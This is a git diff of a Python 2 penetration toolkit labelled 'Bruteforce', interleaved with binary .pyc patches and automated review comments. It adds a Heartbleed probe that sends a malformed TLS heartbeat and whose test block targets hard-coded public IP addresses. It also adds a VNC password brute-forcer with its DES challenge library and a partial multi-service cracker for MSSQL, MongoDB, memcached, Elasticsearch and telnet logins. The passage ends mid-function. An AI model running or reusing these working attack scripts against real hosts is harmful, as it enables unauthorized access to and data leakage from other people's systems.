z0&1dIT3*XrQy+Ov)$~@>x_3o&*>Q0>2>5CZ0y$$4OtN^IpzAYMO77su`FGGfaZ#k7 z{NVA~PYK8(gu2(LH(qM2&Apj~CJh41Q+mD4^2N%DzHT}9H*VhP-RR%x-F&zA-tDb^ z-xs>z%kD)pP=6HFf}iM-`OSSp`(n@(HT<&67pal^FZxI4kS&*ViGX}Pm| z@pLkol}KVI<%NuwonWryP=O+cG5cbSw}TwY-(q`$vRR4RJah;CRn{^fqiiyf*Qpr^ zu>2O3{!MQ9^;m)#9=_0UOJILfCib^X|Mm)+7HD);ZKzgd<9;bO@!DL)*HS+Kr?99# literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ssltest.py b/Bruteforce/plugins/ssltest.py new file mode 100644 index 0000000..207d91d --- /dev/null +++ b/Bruteforce/plugins/ssltest.py 
@@ -0,0 +1,145 @@
+#!/usr/bin/python
+import sys
+import struct
+import socket
+import select
+import time
+import threading
+from printers import printPink,printRed
+from multiprocessing.dummy import Pool
+
+class ssl_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+
+ self.hello = self.h2bin('''
+ 16 03 02 00 dc 01 00 00 d8 03 02 53
+ 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
+ bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
+ 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
+ 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
+ c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
+ c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
+ c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
+ c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
+ 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
+ 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
+ 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
+ 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
+ 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
+ 00 0f 00 01 01
+ ''')
+
+ self.hb = self.h2bin('''
+ 18 03 02 00 03
+ 01 40 00
+ ''')
+
+
+ def h2bin(self,x):
+ return x.replace(' ', '').replace('\n', '').decode('hex')
+
+
+ def recvall(self,s, length, timeout=8):
+ endtime = time.time() + timeout
+ rdata = ''
+ remain = length
+ while remain > 0:
+ rtime = endtime - time.time()
+ if rtime < 0:
+ return None
+ r, w, e = select.select([s], [], [], 5)
+ if s in r:
+ data = s.recv(remain)
+ # EOF?
+ if not data:
+ return None
+ rdata += data
+ remain -= len(data)
+ return rdata
+
+ def recvmsg(self,s):
+ hdr = self.recvall(s, 5)
+ if hdr is None:
+ return None, None, None
+ typ, ver, ln = struct.unpack('>BHH', hdr)
+ pay = self.recvall(s, ln, 10)
+ return typ, ver, pay
+
+
+ def hit_hb(self,s,ip,port):
+ s.send(self.hb)
+ while True:
+ typ, ver, pay = self.recvmsg(s)
+ if typ is None:
+ return False
+
+ if typ == 24:
+ if len(pay) > 3:
+ self.lock.acquire()
+ printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
+ self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
+ self.lock.release()
+ else:
+ self.lock.acquire()
+ printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
+ self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
+ self.lock.release()
+ return True
+
+ if typ == 21:
+ return False
+
+ def openssl_test(self,ip,port):
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sys.stdout.flush()
+ s.connect((ip, port))
+ sys.stdout.flush()
+ s.send(self.hello)
+ sys.stdout.flush()
+ while True:
+ typ, ver, pay = self.recvmsg(s)
+ if typ == None:
+ break
+ # Look for server hello done message.
+ if typ == 22 and ord(pay[0]) == 0x0E:
+ break
+ sys.stdout.flush()
+ s.send(self.hb)
+ self.hit_hb(s,ip,port)
+ except Exception,e:
+ #print e
+ pass
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['ssl']):
+ printPink("crack ssl now...")
+ print "[*] start test openssl_heart %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+ for ip in ipdict['ssl']:
+ pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+ pool.close()
+ pool.join()
+
+ print "[*] stop ssl serice %s" % time.ctime()
+ print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'ssl': ['222.22.224.142:443']}
+ pinglist=['122.225.81.129']
+ test=ssl_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
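Review bot: The socket opened in `openssl_test` is never closed, and the blanket `except Exception,e: pass` hides every failure, so a refused connection, a timeout and a clean negative all end with nothing written to the result file. When `recvall` times out on the payload, `recvmsg` returns `(typ, ver, None)`, and a later `ord(pay[0])` or `len(pay)` on that value raises into the same handler. I would close the socket in a `finally:` block with `s.close()` and record the host as not tested when an exception is caught, so that someone checking remediation does not read silence as "not vulnerable". The `__main__` block also hard-codes two public addresses; a documentation-range placeholder such as `192.0.2.10:443` (constructed example) would keep the sample from pointing at a real host.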
diff --git a/Bruteforce/plugins/ssltest.pyc b/Bruteforce/plugins/ssltest.pyc new file mode 100644 index 0000000000000000000000000000000000000000..00cfc1c8f07253aff22a6729544162233f3e9e72 GIT binary patch literal 5557 zcmb_gU2_}d6+SB|vL)Mbh{*@Eg|`$KmjPRnmBh|;n1qlJ3N>M!5~?<%u6I|~+N+ha z?~2$nc5lK@==({^wHt-rxT9 zMJSWMDxSCSwG~e!!pDj9=p3&P7SUswR7&b-CVIk!XRP&dU;m?M3eDT$1>b>|d66MdFtwT9gRK zotI~2&&yQ#oz-PnBl$1>wpUAN7B!Gjo@B*?Bs(bPr#(N8R$($JDj*Mr!&IlNO}o3} zd^EE!S$u%6{Ur!=aMpynG^IzqX-Bln@-^gx9Vpkj#_)5>3NyS@v9`!tOrUdo&2As?!lHb|W}SWM{PuZriqnN8L>R zn%7NZ!!%l^(J&?oO{2*cKGEi6;@ZY+aeKpD+cjGavlW@GU2_AwcFk^ROe5r@g}Igq zHcfleY~3(nZ?X{oiIJdE3qPB@*oIcwKL9SmnVZ$`B z7jgxpt(MV;ib}o>vjJ%vW^?n~8#f^Ww)B+ZIIOw`QL#*UHCsBdN!ko&8`<0CD#{7E zp{pW2k(QbYF`3wUZlj*nqz2T66r$p>6)06v+bT-C{q2p7SWjtlRja3Kuj|HkQ^ix- zaQZwas&iaJS;BjmJuRjj5JsSpD7U$jdQ99mBGP@3x zD`H!$jgA!by4@s8if(rajO=+b_G;d;S1VO7ES9R}8B7sR?r_apAb_cTMO=X2vy!$I z2-yaLSBOPBt5juMB{l_`VkvyRAg6wO=oFhnCyz&I5XNecC=Q2FtaJV%=5+hv87b^D z9lV3DrESGa6o_eC9z}6g!@r;bfuZ3us9KgQCqQ;jPR_}3NlvPA_>CL`*-LUzk^Ikc zTsd8R^<++tfxwu9UY{rw!;ye;m<;(0IF1kU#j}e1t}G|>a#E9%y5j!498@KLU5#7j z2{7Wxf*dc1{i8BEh5!q4gK|`vy3oOrO-S_Qb$%XU!Okkx+4e7hCiqH1wbT_FcttXZ zwXr?SoW&7VaaibB9*1A4d(t>trAba*VAVSq-z)kBokm8(aiQ%viq%A=qNCZRnD zCIOx6G~J)8L!T;jf^hvA`B#OZ5-#c`whCC*)g1*G3qCuje!%U7u4NqenSsEUN z$EwmRPj7~L#`4_vKe&HCsiWbt_V%_q(SHjg{$&s~r!Dd^{6x?gXQLoISf$wNA^%k_ z(t8!<`Yet{`ur-+6-UxcyQARftW7usds<=sn`UvhWO5b%q<))|{drzo5BLl7 z!#}WnuOydoSM->=>@R%(47M)n*6jXwS;2ch!0P*EW~`u|3Vlw6UQs2UtjME?MH-#C zom>S?=so*6$fMi-_Q%^F-864m1FSYd!B!p@<2;KaGZ^Nv;hix>Kgdi{7~3C?)5yGM zkOkmxlUVcBI0fbhyJ`H>rMi6puFo+W<-;(xmfV80H_QiU_2VEfcH^LU*X)i96D5(! 
zhQ;Ju6J$pwJ}mM;k6v4k8 zT+ICni+aW^LUkWe4eTf}W*M^InMZ~J6U6w7lZRjOg(v^3&LgJ)dpt#^7cLVn+&A(7 zuS};LP5KAfq#W}ACr*Z@EyhquJRElLes7qe; zJY+>L^W;kndIH0CLR@nRibcmN^Ob`+R7SB&E4S};KiNDi1n|dqqW-I!!RBd$uQGO z&LL}?8?TWNV_yh0|7RFGt9T=T4iWl%3uS@!d-Nw!S4PY&c`Nu{z;_yfZ+P=Mas}xu zqycJ^uSVT#h&lutLJ4?DpXRT6$hvSa;|30P84N*p`J?-6V?vm|aIakCu+n)vW$@wS z&xN&3RbM}`1U^T&V7V4N;E9OD%PxawPF{gMzh`1z1z}uE$$RoC3Kp=d^IVTDlrw1I zSAcJehMxmw(jlQ<)qWcI2FGYAlCKNzsn;; zz6K)EYuiPWP3=qQg*o!7qAtMi>Dtp7Qfuq~dR6l&I&n~6(W<4| zPimFLi?v$qO6|%-OcvYSuI0kDwRQLN7Gv)ndl9tNYOU#~z1D2EZnoPS{_QEdrcPX2 z+ib2iTU$vBNHlR^0+;{59;2$JwZfwJKW|bhD*ylh literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/tomcat.pyc b/Bruteforce/plugins/tomcat.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f78b1bdfb5e9ebb7eea3f55f1fdc36e0a1fff4a6 GIT binary patch literal 2789 zcmbtWPj4Gl5TCdH6Wg(qme8bWRq6maiC5-nfGSiym|BIH!1zmYW(P4Jqc<4 z@$mO9zV-)@h^PmuDDo&#)B{uS9`!uoOO%voQl?&+CKc*cNX<2>)T=JEm#DY2;A_;Y z316n9PLl@p8l-fM#>*5{=#_$jDt(K4n-nbx)1s&*%nG~lMW+tOTovRnPHbx8zwp`Z zu-}eFSsokrI5zvPu~F6H6VMerp>oy$G zOtD`Z$7Pz8DJp@hP*kSlDmg`Ck7iinw+bzFyhO7l8kgAleUI`j6%!rTXohgX+Kf-v z`9bhxT%lQAOwSOKI^8)j*C5`S8}&|%E{oAW`Tb*rw8?J5Jy?h3L7CP$fDX}wT>{tm zFP&x4iCX-UgS)4WMJr;rFj}JZ2M^g~p>D3yiT!AmPRpWmY--P}QQ0+Vzd`wzhzRm) z6n!(ju-VcYS!ds8<`^Y~@p;?&5Ikq#oA+xRy~?MEQnw(ZhM7`V38`PXr%+hDOd3T*pO z2m9Kzv%uQJG>^8nZWfqL2RPM zt%W?p>$YMp)DHXYN+8zd2q#gl52o5WE1N^@9G9haft%WXm_}L({&`^a2e%MfB5imV zr(-h|S+4Cgal!^!rcETJo}}Tvgd_+Lrg5%)X%h}>t`iM&(lYm7ggWEsb@*1tI&miF zvov?&-xPr}!9>eq5i4}lMb%JM zbwRCyuBZ)l8Qc}@UBb8SHPjob1zN$X;jMaQ74q{rCHxQpg{w1`U$9@QGg{39^cSo zgZ{?40F&>E^;s7mT&KM~a}kYKk;eOl7>X3I=)ptozKGC${Hk4h4iteJEJDb<&sA&r z<*kO#s3`p>wO|m19rkw2fMV#HPzy)6>}@XVUnEoG-}9F zoJGxEWak-*xz%^=CTN%k;r<+|`jY@i);8(k&d!eIG(NrltPLQ_UHc5ZZ7YdmFfTGV zHK8y;KD7TTBzx%}YiYJXMsz#FF>uu0oQqFi(~eT3Z^TZJ`hF5*Rs&Qq5g2tlt2p6v zMah-CU7(L}oJThT5Je1;Twad=hCWxn&yeAlSb?JeyiAVzfju&ze~l&FC;rr2Be|ZB~XIC{eB?RvfuYPK0c3<0@C@vCLphbQ>KK^`S9Om1#Tvb z-~rvai67Gis&%1Fbq>&8->R?u4Y&zFu>b%7 literal 0 HcmV?d00001 
diff --git a/Bruteforce/plugins/vnc.py b/Bruteforce/plugins/vnc.py
new file mode 100644
index 0000000..72fefee
--- /dev/null
+++ b/Bruteforce/plugins/vnc.py
@@ -0,0 +1,74 @@
+from printers import printPink,printGreen
+import time
+import threading
+from multiprocessing.dummy import Pool
+from vnclib import *
+
+
+class vnc_burp(object):
+
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/vnc.conf")
+
+ def vnc_connect(self,ip,port,password):
+ crack =0
+ try:
+ v = VNC()
+ v.connect(ip, port, 10)
+ code,mesg=v.login(password)
+ if mesg=='OK':
+ crack=1
+ except Exception,e:
+ crack=2
+ pass
+ return crack
+
+ def vnc_l(self,ip,port):
+ try:
+ for data in self.lines:
+ flag=self.vnc_connect(ip=ip,port=port,password=data)
+ if flag==2:
+ self.lock.acquire()
+ print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port)
+ self.lock.release()
+ break
+
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
+ self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
+ self.lock.release()
+ break
+ else:
+ self.lock.acquire()
+ print "login %s vnc service with %s fail " %(ip,data)
+ self.lock.release()
+ except Exception,e:
+ pass
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['vnc']):
+ printPink("crack vnc now...")
+ print "[*] start crack vnc %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['vnc']:
+ pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+
+ print "[*] stop vnc serice %s" % time.ctime()
+ print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
+
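Review bot: `vnc_connect` maps every exception to `crack=2`, and `vnc_l` then prints "not allow connect now because of too many security failure" for that value, although a timeout, a refused connection or any error raised inside `vnclib` takes the same path. The message states a cause the code has not established; wording it neutrally and including the exception text would keep the output honest. In the handler `e` is unused and the `pass` after `crack=2` does nothing. The return codes are bare integers, so a comment such as `# 0 = rejected, 1 = accepted, 2 = connection or protocol error (cause unknown)` at the top of `vnc_connect` would document them.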
diff --git a/Bruteforce/plugins/vnc.pyc b/Bruteforce/plugins/vnc.pyc new file mode 100644 index 0000000000000000000000000000000000000000..3fbd2adc64685ea3e010d47e8514a2b14bdfe19a GIT binary patch literal 2958 zcmb_e-*4PR5T3Q~E|*J=whB#YDV2-V>QqW1A$X|}s%WbssM6v<1A)kL?7hogd~4Uc z*W{$+sr)tk6+H5X@QQc<@e1FJFQkP^NYInLH~VXL_M2~J9RAwx{qX&7k29M8Lj2#x z>vqxPcoY>x6GhvKCIM{+qzdGuz+LCANUOdNPZDbRU7Lc8N2U$C%yZ%)^=l{cu5P*qp~cT9uM8{ zU9?Yamh4XJ>aVNt)W>+;O*ESL1~47x;}WfN#RxkVcKr;_etvn@@PwEbj2Jn{vMm*JstG9j?RNH5LQ`- zUpig8^#fD5(yn{J>DGtZj`pUh9l0#ER@cdTRZK_5I*1SO7PC$*@~ z;LZ3vb|0G|cvTR9!f}gcpOP21AGhhKO=IAK2VMYzAt@dT=qO~sz76QOL&pnrw7@Re z52$`fd5g7JqAh!oS{}nas`p79cfqo@%qjZns0EZ6oehJA4710x2OoZB7z4wy_!b(7 z9&g<7%sx25>TC{QiTety_YN~%c~jZ}-zi>3Bf3l_o~X*&3m#SK+(B9Af__$~a1fvM zR90nWu0@z=Hz-;;v9H}{ewYxg+ibYbm0c}$5>VdH0CLBK;z9}K&$sZ;Q+u~ zOXeQIXS}f^8-ILpBOuG+XJG=48HTh90w`9{p)uUwefi|6_9y)pHRg-51G@fc3f69I z*%i>IEA&}X3T#vs#F6l1wrs?&qm9pV!+;87+7%qL%7bX`0gN0( zyE;p!PDkZ1LOey2)XpNOvuSPoEE=Y!nATc&=-&Ce!oAc*2Rhx?Hag+c)vNFF@0#oP zB!9hNK=dyg-o^n1Q<<%0yAkY9O{Sv*GW%_b;fo(6$1Og7bJY-pKazD^YL-S3*_-|3LYRU|xMmAx1eTfrX$x;=Q3b zSk1DedvFGqYH}44)#1*Gg1bAPOWFc;!Rw|FAoF9n4`}NM>Ut7NEG>xymOpP=-jl9ahfMkgtUbIO0i)mC*omA^Yacx~ zf6X=CpV~}>v>rLhfwv5{P!kHLyUXf?sZ3Om)ZLhCKGm6*R^K#U=zp(BE2s0wn~A;! zN=r6IJbG>Y{A5(d!C5Gg8x-2ce6HBSo0^QxQp|S54Rz2J;m z2`(!McriIiY&y|NB6m!ZNtsUzbmP~sy-6vIVa(r6rzVQ@pT9w3zJ3?4e0y}l#m-`X z@xnk#JrB#bBff0J)lJf38pRB@=e$0_cay2=GSkih@wI$9nammj@EY*EFuUT(a(9f+ b0y*$iSud!4*x>XLXH>_AuOf9VGu+{yiKbs( literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/vnclib.py b/Bruteforce/plugins/vnclib.py new file mode 100644 index 0000000..eaf6470 --- /dev/null +++ b/Bruteforce/plugins/vnclib.py 
@@ -0,0 +1,97 @@
+__author__ = 'wilson'
+from Crypto.Cipher import DES
+from sys import version_info
+import time
+
+class VNC_Error(Exception):
+ pass
+class VNC:
+ def connect(self, host, port, timeout):
+ self.fp = socket.create_connection((host, port), timeout=timeout)
+ resp = self.fp.recv(99) # banner
+
+ self.version = resp[:11].decode('ascii')
+
+ if len(resp) > 12:
+ raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore')))
+
+ return self.version
+
+ def login(self, password):
+ major, minor = self.version[6], self.version[10]
+
+ if (major, minor) in [('3', '8'), ('4', '1')]:
+ proto = b'RFB 003.008\n'
+
+ elif (major, minor) == ('3', '7'):
+ proto = b'RFB 003.007\n'
+
+ else:
+ proto = b'RFB 003.003\n'
+
+ self.fp.sendall(proto)
+
+ time.sleep(0.5)
+
+ resp = self.fp.recv(99)
+
+
+ if minor in ('7', '8'):
+ code = ord(resp[0:1])
+ if code == 0:
+ raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
+
+ self.fp.sendall(b'\x02') # always use classic VNC authentication
+ resp = self.fp.recv(99)
+
+ else: # minor == '3':
+ code = ord(resp[3:4])
+ if code != 2:
+ raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
+
+ resp = resp[-16:]
+
+ if len(resp) != 16:
+ raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)')
+
+
+ pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded
+
+ key = self.gen_key(pw)
+
+
+ des = DES.new(key, DES.MODE_ECB)
+ enc = des.encrypt(resp)
+
+
+ self.fp.sendall(enc)
+
+ resp = self.fp.recv(99)
+
+ self.fp.close()
+ code = ord(resp[3:4])
+ mesg = resp[8:].decode('ascii', 'ignore')
+
+ if code == 1:
+ return code, mesg or 'Authentication failure'
+
+ elif code == 0:
+ return code, mesg or 'OK'
+
+ else:
+ raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code))
+
+ def gen_key(self, key):
+ newkey = []
+ for ki in range(len(key)):
+ bsrc = ord(key[ki])
+ btgt = 0
+ for i in range(8):
+ if bsrc & (1 << i):
+ btgt = btgt | (1 << 7-i)
+ newkey.append(btgt)
+
+ if version_info[0] == 2:
+ return ''.join(chr(c) for c in newkey)
+ else:
+ return bytes(newkey)
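Review bot: `login` closes `self.fp` only on the path that reaches the final read; every `raise VNC_Error(...)` before that point, and any socket error, leaves the connection open, and `connect` has the same gap when the banner is longer than 12 bytes. Wrapping the body in `try:` with `finally: self.fp.close()` would release the socket on every path. `gen_key` has no docstring: the loop mirrors the bit order of each key byte (`1 << i` becomes `1 << 7-i`), and `pw = password.ljust(8, '\x00')[:8]` shows that only the first eight characters of a password ever reach the DES key, which deserves a comment because it bounds the strength of any password set on a server using this scheme.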
diff --git a/Bruteforce/plugins/vnclib.pyc b/Bruteforce/plugins/vnclib.pyc new file mode 100644 index 0000000000000000000000000000000000000000..6b3415140b036f7fc6c2545488a2d3d078232983 GIT binary patch literal 3325 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: + data4=data3.replace('0X',str(hex(lusername)).replace('0x','')) + else: + data4=data3.replace('X',str(hex(lusername)).replace('0x','')) + if lpassword>=16: + data5=data4.replace('0Y',str(hex(lpassword)).replace('0x','')) + else: + data5=data4.replace('Y',str(hex(lpassword)).replace('0x','')) + hladd = hex(ladd).replace('0x', '') + data6=data5.replace('ZZ',str(hladd)) + data7=binascii.a2b_hex(data6) + sock.send(data7) + packet=sock.recv(1024) + if 'master' in packet: + return "username:%s,password:%s" % (user,pass_) + except: + return 3 + def mongodb(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") + s.send(data) + result = s.recv(1024) + if "ismaster" in result: + getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") + s.send(getlog_data) + result = s.recv(1024) + if "totalLinesWritten" in result: + return "unauthorized" + else:return 3 + except Exception,e: + return 3 + def memcached(self,user,pass_): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("stats\r\n") + result = s.recv(1024) + if "version" in result: + return "unauthorized" + def elasticsearch(self,user,pass_): + url = "http://"+self.ip+":"+str(self.port)+"/_cat" + data = urllib2.urlopen(url).read() + if '/_cat/master' in data: + return "unauthorized" + else: + return 3 + def telnet(self,user,pass_): + try: + tn = telnetlib.Telnet(self.ip,self.port,self.timeout) + #tn.set_debuglevel(3) + time.sleep(0.5) + os = tn.read_some() + except Exception ,e: + return 3 + user_match="(?i)(login|user|username)" + pass_match='(?i)(password|pass)' + login_match='#|\$|>' + if re.search(user_match,os): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + pass + else: + try: + info=tn.read_until(user_match,timeout=2) + except Exception,e: + return 3 + if re.search(user_match,info): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return 
"username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + elif re.search(pass_match,info): + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "password:%s" % (pass_) + def get_hash(self,password, scramble): + hash_stage1 = hashlib.sha1(password).digest() + hash_stage2 = hashlib.sha1(hash_stage1).digest() + to = hashlib.sha1(scramble+hash_stage2).digest() + reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)] + hash = struct.pack('20B', *reply) + return hash + def get_scramble(self,packet): + scramble,plugin = '','' + try: + tmp = packet[15:] + m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) + if 